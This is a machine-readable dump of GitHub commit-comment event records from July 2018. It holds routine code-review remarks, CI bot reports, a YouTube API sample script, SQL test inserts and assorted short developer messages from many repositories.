{"id":"7947039850","type":"CommitCommentEvent","actor":{"login":"hdmjunior"},"repo":{"name":"y20k/transistor"},"payload":{"comment":{"id":29664635,"position":null,"line":null,"path":null,"commit_id":"83ce1f46d3b1397fa0a2073ee065dda4a4ba19dc","created_at":"2018-07-11T00:14:06Z","updated_at":"2018-07-11T00:14:06Z","author_association":"CONTRIBUTOR","body":"Hello!\r\nThank you! When I found that I coul help translating it, I tought, \"why not!?\". It was my first time translating and contributing with anything like that, so I'm really glad for the experience and I tried to do the best I could. And of course, thank you for Transistor, it's a really nice app! I'd be happy to help again :)"}},"created_at":"2018-07-11T00:14:06Z"}
{"id":"7947041049","type":"CommitCommentEvent","actor":{"login":"jsp4608"},"repo":{"name":"jsp4608/khProject"},"payload":{"comment":{"id":29664638,"position":null,"line":null,"path":null,"commit_id":"073fb56da78c09adccb1a91155ec4711f694b508","created_at":"2018-07-11T00:14:32Z","updated_at":"2018-07-11T00:14:32Z","author_association":"OWNER","body":"ㅣㅏ"}},"created_at":"2018-07-11T00:14:32Z"}
{"id":"7947044835","type":"CommitCommentEvent","actor":{"login":"locdown2311"},"repo":{"name":"UFOP-Eng-Comp/ProjetoClinica"},"payload":{"comment":{"id":29664643,"position":15,"line":262,"path":"src/visao/FormGerarAtestado.java","commit_id":"090dae6d37a01a7d227821568c46c087dfea3712","created_at":"2018-07-11T00:15:57Z","updated_at":"2018-07-11T00:15:57Z","author_association":"CONTRIBUTOR","body":"Uso de calendar pra aleatoriedade"}},"created_at":"2018-07-11T00:15:57Z"}
{"id":"7947045815","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29664646,"position":43,"line":170,"path":"src/NUnitFramework/framework/Internal/TestParameters.cs","commit_id":"dcdc37bf030c744fb6cdccde8ea148b8a092aadf","created_at":"2018-07-11T00:16:21Z","updated_at":"2018-07-11T00:16:21Z","author_association":"CONTRIBUTOR","body":"Sigh. It was public, and later I forgot that the location in the file was correlated with the visibility modifier.\r\nI'll fix. Thanks for the ping!"}},"created_at":"2018-07-11T00:16:21Z"}
{"id":"7947046441","type":"CommitCommentEvent","actor":{"login":"RooRoa123"},"repo":{"name":"Matiasruizr/PLSQLAvanzado"},"payload":{"comment":{"id":29664647,"position":null,"line":null,"path":null,"commit_id":"172baf45638c0c7f1a9ef85a21da1a158d8e4dc5","created_at":"2018-07-11T00:16:36Z","updated_at":"2018-07-11T00:16:36Z","author_association":"NONE","body":"INSERT INTO TRANSACCION_TARJETA_CLIENTE VALUES('29320393064','1001','25/03/2017','900000','24','945000','');\r\nINSERT INTO TRANSACCION_TARJETA_CLIENTE VALUES('29320393064','1002','04/04/2018','76500','6','80325','');\r\nINSERT INTO TRANSACCION_TARJETA_CLIENTE VALUES('29320393064','1003','25/04/2018','585900','12','644490','');\r\nINSERT INTO TRANSACCION_TARJETA_CLIENTE VALUES('28418181488','1002','05/02/2018','300000','10','315000','');"}},"created_at":"2018-07-11T00:16:36Z"}
{"id":"7947048164","type":"CommitCommentEvent","actor":{"login":"rlsouza1687"},"repo":{"name":"rlsouza1687/shellscript"},"payload":{"comment":{"id":29664652,"position":null,"line":null,"path":null,"commit_id":"9df0a24bc56aa490457bd98703bcd15f97b69e37","created_at":"2018-07-11T00:17:16Z","updated_at":"2018-07-11T00:17:16Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T00:17:16Z"}
{"id":"7947052232","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29664661,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-11T00:18:54Z","updated_at":"2018-07-11T00:18:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T00:18:54Z"}
{"id":"7947052498","type":"CommitCommentEvent","actor":{"login":"jackzampolin"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29664662,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-11T00:19:01Z","updated_at":"2018-07-11T00:19:01Z","author_association":"OWNER","body":"As you can also see you are running that command as `user` and running the install script as `root` this is a different environment. You don't need to run the script as root. Please try again."}},"created_at":"2018-07-11T00:19:01Z"}
{"id":"7947054074","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29664665,"position":1,"line":1,"path":"src/NUnitFramework/tests/Internal/TestDataTests.cs","commit_id":"dcdc37bf030c744fb6cdccde8ea148b8a092aadf","created_at":"2018-07-11T00:19:40Z","updated_at":"2018-07-11T00:19:40Z","author_association":"CONTRIBUTOR","body":"Shouldn't this file have our standard header at the top (copyright/license)?"}},"created_at":"2018-07-11T00:19:40Z"}
{"id":"7947055441","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29664669,"position":null,"line":null,"path":null,"commit_id":"c60e7b57f05e0dc3a75fcef5f440bee4f3217fc6","created_at":"2018-07-11T00:20:13Z","updated_at":"2018-07-11T00:20:13Z","author_association":"COLLABORATOR","body":"<h3>set tabIndex=-1 on disabled buttons</h3>\n\nPreview: <strong><a href='https://18249-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18249-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18249-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T00:20:13Z"}
{"id":"7947058140","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664684,"position":18,"line":48,"path":"src/AspNetCoreModuleV2/AspNetCore/src/applicationmanager.cxx","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-11T00:21:19Z","updated_at":"2018-07-11T00:21:19Z","author_association":"CONTRIBUTOR","body":"Yeah, but DebugInitialize is already double call protected outside of debug util. Also, debug initialize in the request handler is works this way too. I'd rather not have to port everything to need a double check lock with everything initialized in the shim and request handler."}},"created_at":"2018-07-11T00:21:19Z"}
{"id":"7947058149","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29664685,"position":1,"line":1,"path":"src/NUnitFramework/tests/Internal/TestDataTests.cs","commit_id":"dcdc37bf030c744fb6cdccde8ea148b8a092aadf","created_at":"2018-07-11T00:21:19Z","updated_at":"2018-07-11T00:21:19Z","author_association":"CONTRIBUTOR","body":"Yes."}},"created_at":"2018-07-11T00:21:19Z"}
{"id":"7947059296","type":"CommitCommentEvent","actor":{"login":"kiddyboots216"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29664688,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-11T00:21:48Z","updated_at":"2018-07-11T00:21:48Z","author_association":"NONE","body":"I previously ran into this series of errors when I ran the install script without sudo.\r\nhttps://pastebin.com/VkQPk2dT"}},"created_at":"2018-07-11T00:21:48Z"}
{"id":"7947060064","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29664690,"position":null,"line":null,"path":null,"commit_id":"f1c90e8f1a7416107ca1f2566ecb72026ac89e0b","created_at":"2018-07-11T00:22:07Z","updated_at":"2018-07-11T00:22:07Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/25/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : org.jenkinsci.plugins.workflow.steps.FlowInterruptedException\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/25//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/f1c90e8f1a7416107ca1f2566ecb72026ac89e0b/25/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/f1c90e8f1a7416107ca1f2566ecb72026ac89e0b/25/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/f1c90e8f1a7416107ca1f2566ecb72026ac89e0b/25/jenkins-results/generator-diff/index.html) (only version changes)\n"}},"created_at":"2018-07-11T00:22:07Z"}
{"id":"7947076253","type":"CommitCommentEvent","actor":{"login":"timrichardson"},"repo":{"name":"matthieugras/Prime-Ubuntu-18.04"},"payload":{"comment":{"id":29664730,"position":null,"line":null,"path":null,"commit_id":"4223e8a8afe9b6c45a3cd336684c281e1b42af80","created_at":"2018-07-11T00:28:36Z","updated_at":"2018-07-11T00:28:36Z","author_association":"CONTRIBUTOR","body":"This should be a warning rather than stopping install, and should only be check if it is a first-time install.\r\nIt will block a reinstall if in intel mode, for no good reason."}},"created_at":"2018-07-11T00:28:36Z"}
{"id":"7947077898","type":"CommitCommentEvent","actor":{"login":"rsh391"},"repo":{"name":"youtube/api-samples"},"payload":{"comment":{"id":29664734,"position":66,"line":212,"path":"apps-script/youtube.gs","commit_id":"0fd6025239c22748e975b6173a51e902ddc8cba2","created_at":"2018-07-11T00:29:15Z","updated_at":"2018-07-11T00:29:15Z","author_association":"NONE","body":"#!/usr/bin/python\r\n\r\nimport httplib2\r\nimport os\r\nimport sys\r\n\r\nfrom apiclient.discovery import build\r\nfrom apiclient.errors import HttpError\r\nfrom oauth2client.client import flow_from_clientsecrets\r\nfrom oauth2client.file import Storage\r\nfrom oauth2client.tools import argparser, run_flow\r\n\r\n\r\n# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains\r\n# the OAuth 2.0 information for this application, including its client_id and\r\n# client_secret. You can acquire an OAuth 2.0 client ID and client secret from\r\n# the {{ Google Cloud Console }} at\r\n# {{ https://cloud.google.com/console }}.\r\n# Please ensure that you have enabled the YouTube Data API for your project.\r\n# For more information about using OAuth2 to access the YouTube Data API, see:\r\n#   https://developers.google.com/youtube/v3/guides/authentication\r\n# For more information about the client_secrets.json file format, see:\r\n#   https://developers.google.com/api-client-library/python/guide/aaa_client_secrets\r\nCLIENT_SECRETS_FILE = \"client_secrets.json\"\r\n\r\n# This OAuth 2.0 access scope allows for read-only access to the authenticated\r\n# user's account, but not other types of account access.\r\nYOUTUBE_READONLY_SCOPE = \"https://www.googleapis.com/auth/youtube.readonly\"\r\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\r\nYOUTUBE_API_VERSION = \"v3\"\r\n\r\n# This variable defines a message to display if the CLIENT_SECRETS_FILE is\r\n# missing.\r\nMISSING_CLIENT_SECRETS_MESSAGE = \"\"\"\r\nWARNING: Please configure OAuth 2.0\r\n\r\nTo make this sample run you will need to populate the client_secrets.json file\r\nfound at:\r\n\r\n   %s\r\n\r\nwith information from the {{ Cloud Console }}\r\n{{ https://cloud.google.com/console }}\r\n\r\nFor more information about the client_secrets.json file format, please visit:\r\nhttps://developers.google.com/api-client-library/python/guide/aaa_client_secrets\r\n\"\"\" % os.path.abspath(os.path.join(os.path.dirname(__file__),\r\n                                   CLIENT_SECRETS_FILE))\r\n\r\nVALID_BROADCAST_STATUSES = (\"all\", \"active\", \"completed\", \"upcoming\",)\r\n\r\ndef get_authenticated_service(args):\r\n  flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,\r\n    scope=YOUTUBE_READONLY_SCOPE,\r\n    message=MISSING_CLIENT_SECRETS_MESSAGE)\r\n\r\n  storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\r\n  credentials = storage.get()\r\n\r\n  if credentials is None or credentials.invalid:\r\n    credentials = run_flow(flow, storage, args)\r\n\r\n  return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\r\n    http=credentials.authorize(httplib2.Http()))\r\n\r\n# Retrieve a list of broadcasts with the specified status.\r\ndef list_broadcasts(youtube, broadcast_status):\r\n  print \"Broadcasts with status '%s':\" % broadcast_status\r\n\r\n  list_broadcasts_request = youtube.liveBroadcasts().list(\r\n    broadcastStatus=broadcast_status,\r\n    part=\"id,snippet\",\r\n    maxResults=50\r\n  )\r\n\r\n  while list_broadcasts_request:\r\n    list_broadcasts_response = list_broadcasts_request.execute()\r\n\r\n    for broadcast in list_broadcasts_response.get(\"items\", []):\r\n      print \"%s (%s)\" % (broadcast[\"snippet\"][\"title\"], broadcast[\"id\"])\r\n\r\n    list_broadcasts_request = youtube.liveBroadcasts().list_next(\r\n      list_broadcasts_request, list_broadcasts_response)\r\n\r\nif __name__ == \"__main__\":\r\n  argparser.add_argument(\"--broadcast-status\", help=\"Broadcast status\",\r\n    choices=VALID_BROADCAST_STATUSES, default=VALID_BROADCAST_STATUSES[0])\r\n  args = argparser.parse_args()\r\n\r\n  youtube = get_authenticated_service(args)\r\n  try:\r\n    list_broadcasts(youtube, args.broadcast_status)\r\n  except HttpError, e:\r\n    print \"An HTTP error %d occurred:\\n%s\" % (e.resp.status, e.content)"}},"created_at":"2018-07-11T00:29:15Z"}
{"id":"7947084345","type":"CommitCommentEvent","actor":{"login":"aliaazri"},"repo":{"name":"slabua/robotics-filters"},"payload":{"comment":{"id":29664752,"position":null,"line":null,"path":null,"commit_id":"f3ae1843578aca98998be49e1bc2ff10b5dda423","created_at":"2018-07-11T00:31:40Z","updated_at":"2018-07-11T00:31:40Z","author_association":"NONE","body":"i've been searching for this"}},"created_at":"2018-07-11T00:31:40Z"}
{"id":"7947091929","type":"CommitCommentEvent","actor":{"login":"robeastwood-agency"},"repo":{"name":"robeastwood-agency/au-fhir-base"},"payload":{"comment":{"id":29664773,"position":19,"line":19,"path":"examples/observation-age-example-6monthsto5years.xml","commit_id":"e8da42b68196eb586f30918a04a94c67111038ca","created_at":"2018-07-11T00:34:39Z","updated_at":"2018-07-11T00:34:39Z","author_association":"OWNER","body":"The subsequent commit #[a760bc8](https://github.com/robeastwood-agency/au-fhir-base/commit/a760bc8ca77d1ae09c985a4c9bd27aec8fda83e0) fixes this error by using year as the unit in both low and high value nodes."}},"created_at":"2018-07-11T00:34:39Z"}
{"id":"7947092027","type":"CommitCommentEvent","actor":{"login":"davidpolberger"},"repo":{"name":"jayanderson/json-patch"},"payload":{"comment":{"id":29664774,"position":null,"line":null,"path":null,"commit_id":"f6ecd0dfdcbea70d50a1506aeba6e5ada1492461","created_at":"2018-07-11T00:34:41Z","updated_at":"2018-07-11T00:34:41Z","author_association":"NONE","body":"This change has a huge effect on performance. With a 440 kB patch, containing around 2,000 changes, applied to a 3.5 MB model (both minified), a test program using the unpatched version of the library takes 22 seconds to run on my computer. With the patched version of the library, the entire run takes 20 milliseconds. For comparison, the [zjsonpatch](https://github.com/flipkart-incubator/zjsonpatch) library takes 37 milliseconds to run. All three runs produced identical output."}},"created_at":"2018-07-11T00:34:41Z"}
{"id":"7947092691","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29664778,"position":1,"line":1,"path":"test/Compatibility/local_types.swift","commit_id":"62d13e5842e7fa3be58a694a9c5cc1937c4c39b1","created_at":"2018-07-11T00:34:56Z","updated_at":"2018-07-11T00:34:56Z","author_association":"MEMBER","body":"@DougGregor Should this really be in test/Compatibility, since it's not -swift-version specific? Do you think the test should go into test/decl/nested/ instead?"}},"created_at":"2018-07-11T00:34:56Z"}
{"id":"7947097819","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"jdonaldson/vaxe"},"payload":{"comment":{"id":29664798,"position":38,"line":61,"path":"plugin/haxe.vim","commit_id":"bc944f063be72e9e666ae89c43255b1368afd9c3","created_at":"2018-07-11T00:36:58Z","updated_at":"2018-07-11T00:36:58Z","author_association":"OWNER","body":"FWIW the LanguageClient-neovim client already handles these additional edits, although it causes a few flaws in positioning.  I have a pull request over here : https://github.com/autozimu/LanguageClient-neovim/pull/509"}},"created_at":"2018-07-11T00:36:58Z"}
{"id":"7947099263","type":"CommitCommentEvent","actor":{"login":"dmalikov"},"repo":{"name":"dmalikov/mtl-style-example"},"payload":{"comment":{"id":29664806,"position":null,"line":null,"path":null,"commit_id":"8bf22f80e61e61ddcd6c0cf23b6ab8429279dea7","created_at":"2018-07-11T00:37:29Z","updated_at":"2018-07-11T00:37:29Z","author_association":"OWNER","body":"This don't typecheck:\r\n\r\n```\r\n[3 of 4] Compiling MTLStyleExample.MainSpec ( test-suite/MTLStyleExample/MainSpec.hs, /Users/m/git/mtl-style-example/dist-newstyle/build/x86_64-osx/ghc-8.4.3/mtl-style-example-0.0.0/t/mtl-style-example-test-suite/build/mtl-style-example-test-suite/mtl-style-example-test-suite-tmp/MTLStyleExample/MainSpec.o )\r\n\r\ntest-suite/MTLStyleExample/MainSpec.hs:15:33: error:\r\n    • No instance for (exceptions-0.8.3:Control.Monad.Catch.MonadThrow\r\n                         (ArgumentsT (FileSystemT (LoggerT (ClockT (Either a0))))))\r\n        arising from a use of ‘main’\r\n    • In the first argument of ‘(&)’, namely ‘main’\r\n      In the first argument of ‘(&)’, namely\r\n        ‘main & runArgumentsT [\"sample.txt\"]’\r\n      In the first argument of ‘(&)’, namely\r\n        ‘main & runArgumentsT [\"sample.txt\"]\r\n           & runFileSystemT [(\"sample.txt\", \"Alyssa\")]’\r\n   |\r\n15 |       Right ((), logMessages) = main\r\n   |                                 ^^^^\r\n```"}},"created_at":"2018-07-11T00:37:29Z"}
{"id":"7947099517","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"jdonaldson/vaxe"},"payload":{"comment":{"id":29664807,"position":38,"line":61,"path":"plugin/haxe.vim","commit_id":"bc944f063be72e9e666ae89c43255b1368afd9c3","created_at":"2018-07-11T00:37:35Z","updated_at":"2018-07-11T00:37:35Z","author_association":"OWNER","body":"In other words, I'll probably use the functionality there, and delete this temporary function soon."}},"created_at":"2018-07-11T00:37:35Z"}
{"id":"7947103837","type":"CommitCommentEvent","actor":{"login":"slm23"},"repo":{"name":"lsst-camera-dh/raft-config"},"payload":{"comment":{"id":29664814,"position":null,"line":null,"path":null,"commit_id":"fcbe536690a4b9ad5e6c7d983eed7d8f9b4e2e90","created_at":"2018-07-11T00:39:17Z","updated_at":"2018-07-11T00:39:17Z","author_association":"NONE","body":"looks good"}},"created_at":"2018-07-11T00:39:17Z"}
{"id":"7947106845","type":"CommitCommentEvent","actor":{"login":"AeroCross"},"repo":{"name":"damienadermann/wallofchicken"},"payload":{"comment":{"id":29664823,"position":null,"line":null,"path":null,"commit_id":"37c910ef565e3ad2196dc6dc954ffc90a013da17","created_at":"2018-07-11T00:40:27Z","updated_at":"2018-07-11T00:40:27Z","author_association":"NONE","body":"I like these odds better"}},"created_at":"2018-07-11T00:40:27Z"}
{"id":"7947107382","type":"CommitCommentEvent","actor":{"login":"nguyenvanhoai"},"repo":{"name":"Ambisafe/private_key_recovery_service"},"payload":{"comment":{"id":29664824,"position":7,"line":25,"path":"src/reducers/index.js","commit_id":"7b2c4b622f245d2ffe0bd3513735947b136f961d","created_at":"2018-07-11T00:40:40Z","updated_at":"2018-07-11T00:40:40Z","author_association":"NONE","body":"[private_key_recovery_service-master (1).zip](https://github.com/Ambisafe/private_key_recovery_service/files/2182574/private_key_recovery_service-master.1.zip)\r\n"}},"created_at":"2018-07-11T00:40:40Z"}
{"id":"7947109912","type":"CommitCommentEvent","actor":{"login":"nguyenvanhoai"},"repo":{"name":"Ambisafe/private_key_recovery_service"},"payload":{"comment":{"id":29664828,"position":5,"line":25,"path":"src/reducers/index.js","commit_id":"7b2c4b622f245d2ffe0bd3513735947b136f961d","created_at":"2018-07-11T00:41:38Z","updated_at":"2018-07-11T00:41:38Z","author_association":"NONE","body":"[private_key_recovery_service-master.zip](https://github.com/Ambisafe/private_key_recovery_service/files/2182575/private_key_recovery_service-master.zip)\r\n"}},"created_at":"2018-07-11T00:41:38Z"}
{"id":"7947111354","type":"CommitCommentEvent","actor":{"login":"nguyenvanhoai"},"repo":{"name":"Ambisafe/private_key_recovery_service"},"payload":{"comment":{"id":29664832,"position":5,"line":25,"path":"src/reducers/index.js","commit_id":"7b2c4b622f245d2ffe0bd3513735947b136f961d","created_at":"2018-07-11T00:42:07Z","updated_at":"2018-07-11T00:42:07Z","author_association":"NONE","body":"[private_key_recovery_service-master.zip](https://github.com/Ambisafe/private_key_recovery_service/files/2182577/private_key_recovery_service-master.zip)\r\n"}},"created_at":"2018-07-11T00:42:07Z"}
{"id":"7947114854","type":"CommitCommentEvent","actor":{"login":"jkleiber"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29664835,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-11T00:43:24Z","updated_at":"2018-07-11T00:43:24Z","author_association":"CONTRIBUTOR","body":"@Dancopy\r\n\r\nYes, that is possible with this sketch. This is the code that runs on the board that interfaces with the Colorduino. If you have more than 1 board, make sure you modify which I2C address you deploy to each file. Currently, this sketch only runs on address 8, but the code is not wholly dependent on that. Ultimately what this code does is enable communications between multiple Colorduinos/Arduinos and the rest is up to your imagination.\r\n\r\nAdditionally, you may want to check out our [colorduino-master](https://github.com/Sooner-Competitive-Robotics/colorduino-master) repository. That has the code for a master Arduino sketch to control the Colorduino drivers. All that repository is is a single c++ class. We recommend on the docs to only use it as a singleton, but in reality it can have multiple instances which sounds like what you would want.\r\n\r\nIf you want a Colorduino controller to control itself and other colorduinos, you can do that too. You would make one of them the master, and have it send commands to the other 1 or 2 boards. You would have a separate sketch for the master board (using the master library) and then 2 sketches for the slave boards (using the Slave.ino project in this library).\r\n\r\nMake sure to put the libraries/Colorduino folder in your Arduino libraries folder\r\n"}},"created_at":"2018-07-11T00:43:24Z"}
{"id":"7947117074","type":"CommitCommentEvent","actor":{"login":"gtdeng"},"repo":{"name":"lightboard/node-foreman"},"payload":{"comment":{"id":29664843,"position":null,"line":null,"path":null,"commit_id":"a3982bc495f693aefdb5ade6dda6c5d88bb0effe","created_at":"2018-07-11T00:44:16Z","updated_at":"2018-07-11T00:44:16Z","author_association":"NONE","body":"fixed in v3, https://github.com/strongloop/node-foreman/releases/tag/v3.0.0"}},"created_at":"2018-07-11T00:44:16Z"}
{"id":"7947117582","type":"CommitCommentEvent","actor":{"login":"davidagustin"},"repo":{"name":"davidagustin/codesignal.com"},"payload":{"comment":{"id":29664845,"position":null,"line":null,"path":null,"commit_id":"34dedc7f88b2e54122b729c25a2c6b78dd5f2160","created_at":"2018-07-11T00:44:29Z","updated_at":"2018-07-11T00:44:29Z","author_association":"OWNER","body":"Some people are standing in a row in a park. There are trees between them which cannot be moved. Your task is to rearrange the people by their heights in a non-descending order without moving the trees. People can be very tall!\r\n\r\nExample\r\n\r\nFor a = [-1, 150, 190, 170, -1, -1, 160, 180], the output should be\r\nsortByHeight(a) = [-1, 150, 160, 170, -1, -1, 180, 190].\r\n\r\nInput/Output\r\n\r\n[execution time limit] 4 seconds (rb)\r\n\r\n[input] array.integer a\r\n\r\nIf a[i] = -1, then the ith position is occupied by a tree. Otherwise a[i] is the height of a person standing in the ith position.\r\n\r\nGuaranteed constraints:\r\n1 ≤ a.length ≤ 1000,\r\n-1 ≤ a[i] ≤ 1000.\r\n\r\n[output] array.integer\r\n\r\nSorted array a with all the trees untouched."}},"created_at":"2018-07-11T00:44:29Z"}
{"id":"7947123334","type":"CommitCommentEvent","actor":{"login":"haahhhaaaa"},"repo":{"name":"haahhhaaaa/test"},"payload":{"comment":{"id":29664865,"position":26,"line":26,"path":"index.html","commit_id":"61fc92375373ab50bd43b4b68abdb02e015734b7","created_at":"2018-07-11T00:46:41Z","updated_at":"2018-07-11T00:46:41Z","author_association":"OWNER","body":"<script type=\"text/javascript\" src=\"https://haahhhaaaa.github.io/test/1.js\"></script>"}},"created_at":"2018-07-11T00:46:41Z"}
{"id":"7947129239","type":"CommitCommentEvent","actor":{"login":"nairdo"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29664890,"position":161,"line":2341,"path":"Rock/Rock.csproj","commit_id":"30a6469954f8f7070ee225fd7e543ba400aed854","created_at":"2018-07-11T00:49:07Z","updated_at":"2018-07-11T00:49:07Z","author_association":"MEMBER","body":"Sorry @cabal95 .  Here's our commit(ment) to address this issue: https://github.com/SparkDevNetwork/Rock/commit/28a62289ffeb80066715f29715bab94aaa7f52ac"}},"created_at":"2018-07-11T00:49:07Z"}
{"id":"7947131578","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29664898,"position":5,"line":302,"path":"libpyEM/qtgui/valslider.py","commit_id":"4a37c27781648a904557e427e58e2b3545002bfc","created_at":"2018-07-11T00:50:03Z","updated_at":"2018-07-11T00:50:03Z","author_association":"CONTRIBUTOR","body":"error.\n\nOn Tue, Jul 10, 2018 at 6:45 PM shadow_walker <notifications@github.com>\nwrote:\n\n> Did you change this because of an error or thrown exception?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cryoem/eman2/commit/4a37c27781648a904557e427e58e2b3545002bfc#commitcomment-29664421>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALgM6ME-KAtcFaDz_ixQ8_sJl4F2aI6Jks5uFTysgaJpZM4VKSBM>\n> .\n>\n"}},"created_at":"2018-07-11T00:50:03Z"}
{"id":"7947132564","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29664899,"position":null,"line":null,"path":null,"commit_id":"c21413ddbed233777886f7c9aa1375af8a221f7b","created_at":"2018-07-11T00:50:27Z","updated_at":"2018-07-11T00:50:27Z","author_association":"OWNER","body":"Build version: __`2.0.2-master.29`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/29) :tada:"}},"created_at":"2018-07-11T00:50:27Z"}
{"id":"7947133522","type":"CommitCommentEvent","actor":{"login":"haahhhaaaa"},"repo":{"name":"haahhhaaaa/test"},"payload":{"comment":{"id":29664903,"position":26,"line":26,"path":"index.html","commit_id":"61fc92375373ab50bd43b4b68abdb02e015734b7","created_at":"2018-07-11T00:50:49Z","updated_at":"2018-07-11T00:50:49Z","author_association":"OWNER","body":"<script type=\"text/javascript\" src=\"https://haahhhaaaa.github.io/test/1.js\"></script>"}},"created_at":"2018-07-11T00:50:49Z"}
{"id":"7947133855","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"wegank/android_device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29664904,"position":null,"line":null,"path":null,"commit_id":"55fcacaf4badf334203cca48a701ee3d18fc305d","created_at":"2018-07-11T00:50:58Z","updated_at":"2018-07-11T00:50:58Z","author_association":"NONE","body":"This causes bootloops (on RR). Why was it necessary?"}},"created_at":"2018-07-11T00:50:58Z"}
{"id":"7947134866","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"wegank/android_device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29664908,"position":null,"line":null,"path":null,"commit_id":"55fcacaf4badf334203cca48a701ee3d18fc305d","created_at":"2018-07-11T00:51:22Z","updated_at":"2018-07-11T00:51:22Z","author_association":"NONE","body":"Also, have you removes a USB library too?"}},"created_at":"2018-07-11T00:51:22Z"}
{"id":"7947135730","type":"CommitCommentEvent","actor":{"login":"stepancheg"},"repo":{"name":"stepancheg/rust-protobuf"},"payload":{"comment":{"id":29664911,"position":null,"line":null,"path":null,"commit_id":"ce7a84f08f7a3acba10d04fd5b2c7addf62163e9","created_at":"2018-07-11T00:51:44Z","updated_at":"2018-07-11T00:51:44Z","author_association":"OWNER","body":"@masonk  I was planning to release 3.0 after implementation of JSON parsing and probably serde support, but if you need it, I can do it earlier.\r\n\r\nBut please note that unlike 1.7 and 2.0, version 3 will be an unstable development branch with frequent backward-compatibility breaks e. g. in 3.1 and no backports to previous versions, and 4.0 will be next LTS stable version when enough improvements will be implemented, not very soon."}},"created_at":"2018-07-11T00:51:44Z"}
{"id":"7947136313","type":"CommitCommentEvent","actor":{"login":"e-corp-sam-sepiol"},"repo":{"name":"e-corp-sam-sepiol/vertnode"},"payload":{"comment":{"id":29664912,"position":null,"line":null,"path":null,"commit_id":"ccbd476b04f7dba6c61be7ec4b9478dbf54024a9","created_at":"2018-07-11T00:51:58Z","updated_at":"2018-07-11T00:51:58Z","author_association":"OWNER","body":"1.) fixed crontab issues on hardware that is not a Raspberry Pi ** "}},"created_at":"2018-07-11T00:51:58Z"}
